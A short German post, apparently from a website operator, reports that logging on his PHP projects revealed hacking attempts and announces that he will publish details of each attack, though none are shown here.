ich betreibe im Internet mehrere Projekte, einige davon laufen unter PHP mit Zugriff auf eine Datenbank. Vor einiger Zeit habe ich dann mehrere Protokollierungen mit eingebunden (Besucher, Registrierungen, Logins, ect.).
Nach ein paar Tagen fand ich seltsame Zugriffe vor, die mir zuerst nichts sagten, jedoch bin ich durch diesen Bericht:
dann dahinter gekommen, dass es Hacking-Angriffe waren.
Ich werde ab jetzt jeden Angriff mit allen Details hier veröffentlichen, denn das sind Straftäter, schon der Versuch ist strafbar!
Viele Grüsse
Der Webmaster